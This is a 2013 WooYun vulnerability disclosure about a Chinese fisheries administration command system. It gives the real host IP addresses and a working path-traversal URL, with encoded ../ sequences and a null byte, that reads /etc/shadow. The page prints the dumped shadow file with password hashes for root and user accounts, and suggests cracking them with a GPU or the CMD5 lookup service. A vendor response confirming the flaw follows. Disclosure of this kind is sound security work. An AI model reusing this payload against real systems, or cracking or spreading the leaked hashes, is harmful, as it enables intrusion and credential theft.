当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-017221

漏洞标题:中国某渔政系统的安全问题

相关厂商:中国渔政

漏洞作者: superbing

提交时间:2013-01-15 15:17

修复时间:2013-03-01 15:18

公开时间:2013-03-01 15:18

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-01-15: 细节已通知厂商并且等待厂商处理中
2013-01-17: 厂商已经确认,细节仅向厂商公开
2013-01-27: 细节向核心白帽子及相关领域专家公开
2013-02-06: 细节向普通白帽子公开
2013-02-16: 细节向实习白帽子公开
2013-03-01: 细节向公众公开

简要描述:

中国渔政系统的一点问题,快去钓鱼岛巡航吧!加油!

详细说明:

中国渔政几个指挥系统通用的一个洞。
http://202.127.42.208:8083/EOMS_J2EE/
http://202.127.42.208/EOMS_J2EE/
http://202.127.42.208:8080/CFR/
......
以其中一个为例:
原URL:
http://202.127.42.208/EOMS_J2EE/infopub/manager/TawInformation/download.jsp?name=2012121111284296.doc&fileatt=2013年系统对外提供服务时间安排_2012121111284296.doc
构造的URL:
http://202.127.42.208/EOMS_J2EE/infopub/manager/TawInformation/download.jsp?name=/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E
%2E//etc/shadow%00.zip&fileatt=2013年系统对外提供服务时间安排.txt
下载回来的etc/password
root:$1$apqXBjsl$Iey1AIPiiKbyvybIeOkUs0:15392:0:99999:7:::
bin:*:15392:0:99999:7:::
daemon:*:15392:0:99999:7:::
adm:*:15392:0:99999:7:::
lp:*:15392:0:99999:7:::
sync:*:15392:0:99999:7:::
shutdown:*:15392:0:99999:7:::
halt:*:15392:0:99999:7:::
mail:*:15392:0:99999:7:::
news:*:15392:0:99999:7:::
uucp:*:15392:0:99999:7:::
operator:*:15392:0:99999:7:::
games:*:15392:0:99999:7:::
gopher:*:15392:0:99999:7:::
ftp:*:15392:0:99999:7:::
nobody:*:15392:0:99999:7:::
nscd:!!:15392:0:99999:7:::
vcsa:!!:15392:0:99999:7:::
pcap:!!:15392:0:99999:7:::
ntp:!!:15392:0:99999:7:::
rpc:!!:15392:0:99999:7:::
mailnull:!!:15392:0:99999:7:::
smmsp:!!:15392:0:99999:7:::
sshd:!!:15392:0:99999:7:::
rpcuser:!!:15392:0:99999:7:::
nfsnobody:!!:15392:0:99999:7:::
dbus:!!:15392:0:99999:7:::
haldaemon:!!:15392:0:99999:7:::
avahi:!!:15392:0:99999:7:::
avahi-autoipd:!!:15392:0:99999:7:::
apache:!!:15392:0:99999:7:::
xfs:!!:15392:0:99999:7:::
gdm:!!:15392:0:99999:7:::
sabayon:!!:15392:0:99999:7:::
ais:!!:15392:0:99999:7:::
pegasus:!!:15392:0:99999:7:::
piranha:!!:15392:0:99999:7:::
luci:!!:15392:0:99999:7:::
ricci:!!:15392:0:99999:7:::
yiyang:$1$3W3OTUH7$L1a3EtQulgizDnCuKv.wy1:15392:0:99999:7:::
nybzg:$1$MPOyv4LO$ixlYtrswhsekFFNjwZXJD.:15392:0:99999:7:::
关于解密:
密码是用GPU跑也好,CMD5查也好(有几个CMD5可以查到的)。
跑了密码干啥,大家都知道!我就不搞了。只为了点分数。

漏洞证明:

修复方案:

专家比我懂!!!

版权声明:转载请注明来源 superbing@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-01-17 09:46

厂商回复:

CNVD确认并复现所述情况,已转由CNCERT协调涉事单位处置。
综合rank=5

最新状态:

暂无